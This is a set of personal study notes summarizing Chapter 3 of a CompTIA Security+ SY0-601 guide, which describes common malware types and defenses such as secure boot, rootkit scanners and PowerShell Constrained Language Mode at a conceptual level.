Comptia Security+ 601 Chapter 3 Summary

CompTIA Security+ Study Guide: Exam SY0-601 8th Edition, by Mike Chapple & David Seidl

Chapter 3 summary of my notes.

1. Malware

            Types of Malware:

1. Ransomware
   
   
   
   1. Ransomware is the encryption of computer files by a malicious third party whomst then demands a ransom in order for a decryption key
   
   
   2. One of the most important defenses against ransomware is an effective backup system
   
   
   
   

2. Trojans
   
   
   
   1. Trojans, or Trojan horses, are a type of malware that is typically disguised as legitimate software.
   
   
   
   

3. RATS
   
   
   
   1. Remote access Trojans (RATs) provide attackers with remote access to systems.
   
   
   
   

4. Worms
   
   
   
   1. Unlike Trojans that require user interaction, worms spread themselves. Although worms are often associated with spreading via attacks on vulnerable services, any type of spread through automated means is possible, meaning that worms can spread via email attachments, network file shares, or other methods as well. Worms also self-install, rather than requiring users to click on them, making them quite dangerous.
   
   
   
   

5. Rootkits
   
   
   
   1. Rootkits are malware that is specifically designed to allow attackers to access a system through a backdoor.
   
   
   2. They infect startup code in the master boot record (MBR) of a disk which allows for attacks against full-disk encryption systems.
   
   
   
   

6. Backdoors
   
   
   
   1. Backdoors can be hardware or software based, but in most scenarios for the Security+ exam you will be concerned with software-based backdoors. Detecting backdoors can sometimes be done by checking for unexpected open ports and services, but more complex backdoor tools may leverage existing services.
   
   
   2. Examples include web-based backdoors that require a different URL under the existing web service, and backdoors that conceal their traffic by tunneling out to a remote control host using encrypted or obfuscated channels.
   
   
   
   


7. Keyloggers
   
   
   
   1. Keyloggers work in a multitude of ways, ranging from tools that capture data from the kernel, to APIs or scripts, or even directly from memory.
   
   
   
   


8. Logic Bombs
   
   
   
   1. Logic bombs are functions or code that are placed inside other programs that will activate when set conditions are met.
   
   
   
   


9. Spyware
   
   
   
   1. Spyware is malware that is designed to obtain information about an individual, organization, or system.
   
   
   
   


10. Virus
    
    
    
    1. Computer viruses are malicious programs that self-copy and self-replicate.
    
    
    2. Viruses typically have both a trigger, which sets the conditions for when the virus will execute, and a payload, which is what the virus does, delivers, or the actions it performs.
    
    
    
    


11. Filess Virus
    
    
    
    1. Fileless virus attacks are similar to traditional viruses in a number of critical ways. They spread via methods like spam email and malicious websites, and they exploit flaws in browser plug-ins and web browsers themselves.
    
    
    2. They inject themselves into memory and conduct further malicious activity, including adding the ability to reinfect the system by the same process at reboot through a registry entry or other technique. At no point do they require local file storage, because they remain memory resident throughout their entire active life—in fact, the only stored artifact of many fileless attacks would be the artifacts of their persistence techniques, like the registry entry.
    
    
    
    

2. Defenses against malware

Tools like secure boot and techniques that can validate live systems and files can also be used to help prevent rootkits from being successfully installed or remaining resident. Techniques like integrity checking and data validation against expected responses can also be useful for rootkit detection.                               

Many botnet command and control (C&C) systems operate in a client-server mode and they will contact central control systems, which provide commands and updates. Peer-to-peer networks connect bots to each other, making it harder to take down a single central server or a handful of known C&C IP addresses or domains. Many botnets use fast flux DNS; Frequent updates (fast flux) mean that the many systems in the network of control hosts register and de-register their addresses, often every few minutes on an ongoing basis. Taking down the domain name is the best way to defeat a fast flux DNS–based botnet or malware,

Defenses against PowerShell attacks include using Constrained Language Mode, which limits sensitive commands in PowerShell, and using Windows Defender's built-in Application Control tool or AppLocker to validate scripts and to limit which modules and plug-ins can be run.

Fortunately, there are existing tools to search for rootkits like chkrootkit and rkhunter, which can help defenders search for and identify rootkits.

Adversarial artificial intelligence is a developing field where artificial intelligence (AI) is used by attackers for malicious purposes. Tainted training data for machine learning algorithms will be a target, and the security of machine learning algorithms themselves will be increasingly important.